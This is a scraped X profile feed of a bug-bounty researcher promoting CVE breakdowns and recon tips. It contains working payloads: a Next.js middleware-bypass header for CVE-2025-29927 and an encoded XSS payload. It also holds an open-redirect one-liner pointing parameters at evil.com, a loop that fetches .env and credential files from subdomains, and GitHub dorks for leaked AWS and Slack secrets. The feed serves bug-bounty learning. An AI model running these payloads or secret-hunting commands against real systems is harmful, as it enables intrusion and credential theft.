
VAIDIK PANDYA
@h4x0r_fr34k
Followers
8K
Following
311
Media
251
Statuses
802
Escape the ordinary! Building: @tcb_securities 🔲 Explorer 🔲 CyberSecurity Enthusiast🔲 YouTuber Click here👇
somewhere
Joined December 2020
Upcoming CVE & Bug Bounty POC Breakdowns I’ve been working on detailed breakdowns of some new vulnerabilities: CVE-2025-0133 : XSS CVE-2025-53833 : SSTI CVE-2025-30208 : Local File Inclusion All videos will premiere soon on YouTube. 🔗 Watch here: https://t.co/7Rb8lWDK7Q
0
2
7
Back to Youtube : Starting with this one https://t.co/i1iTbsf9S0
0
3
23
We need more buddy 🔥
That feeling when your bug bounty finally hits. 🤑 My ramen budget just got a serious upgrade for the month! 💰💸 So grateful for programs that reward security research. 💲💵 #bugbounty #infosec #hacker
0
0
10
CVE-2025-29927 Exploitation : X-Nextjs-Data: 1 X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
1
71
325
Open Redirects with One-Liners One Liner : cat waybacks.txt | \ sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \ httpx -silent -mc 301,302,307,308 -location
0
53
259
One liner for finding files subfinder -d https://t.co/i395E8AVy1 -silent | \ while read host; do \ Â for path in /config.js /config.json /app/config.js /settings.json /database.json /firebase.json /.env /.env.production /api_keys.json /credentials.json /secrets.json
5
120
641
Check this out 👇Just pushed a new repo to GitHub focused on multiple technologies and panels. If you're doing recon, there's a good chance this helps you: Link : https://t.co/4MR6iqqgCA post : 4/100
github.com
Contribute to Vaidik-pandya/ADV development by creating an account on GitHub.
0
7
28
🔍 GitHub Recon: Complete Guide Here’s a list of dorks you can use: Category 1: Credential & Secret Leakage org:"target" "aws_access_key_id" org:"target" "aws_secret_access_key" org:"target" "Authorization: Bearer" org:"target" "slack_token" path:*.json org:"target"
2
86
262
Post 2/100 CVE-2025-0133 : Payload + Template Payload: %3Csvg%20xmlns%3D%22http%3A%2F% https://t.co/l9uRav4jue%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E Write-up: https://t.co/nZzhUUmsIS Template: https://t.co/WOcSN2ImWz ---- Check About
6
58
328
Post 1/100 CVE-2025-2775 : Discovery + Exploitation + Template Shodan Dork : http.title:"SysAid" Fofa Dork : title="SysAid" || body="SysAid Technologies" Exploit: https://t.co/v2IFYloVem Template : https://t.co/nhCTtCi1aT ---- Check it Out : https://t.co/xRDufV8hCw
1
13
97
Alright, I’ve been off the grid for a while... but I’m back. Will be posting again over X
0
0
6
Nothing fancy. Just focused learning. Sometimes all someone needs is structure. Not a magic tool. Just a clearer path. That’s what these sessions aim to offer — a space to explore real-world bugs, build tools, and understand the "Why" behind each step. This is how the session
0
0
7
Web Cache Poisoning! here are few reports to Explore them! 1. https://t.co/mZWzapMIUJ 2. https://t.co/c28Aunv0oc 3. https://t.co/rbai5aLO9Y 4. https://t.co/TFfiWvB21q 5. https://t.co/9XDn4wCrMN 6. https://t.co/2dCGXRM2EJ 7. https://t.co/h3TAjAzYVn 8.
hackerone.com
Hi there, I just found the website: https://help.nextcloud.com is infected with "Web cache poisoning" Abuse this bug, Attacker can: 1. Poison your cache with HTTP header with XSS included. This...
0
87
335
Credential leaks! here are few blogs to learn about them! 1. https://t.co/MauCoLGPTI 2. https://t.co/dxboVwKa0F 3. https://t.co/Q18O4Cw0dF 4. https://t.co/ZOO3dzXjhz 5. https://t.co/MsI8iOvx7J 6. https://t.co/emU21NpXEv 7. https://t.co/AkP3ZmHADp 8.
infosecwriteups.com
Complex libraries lead to hidden attack vectors
0
41
170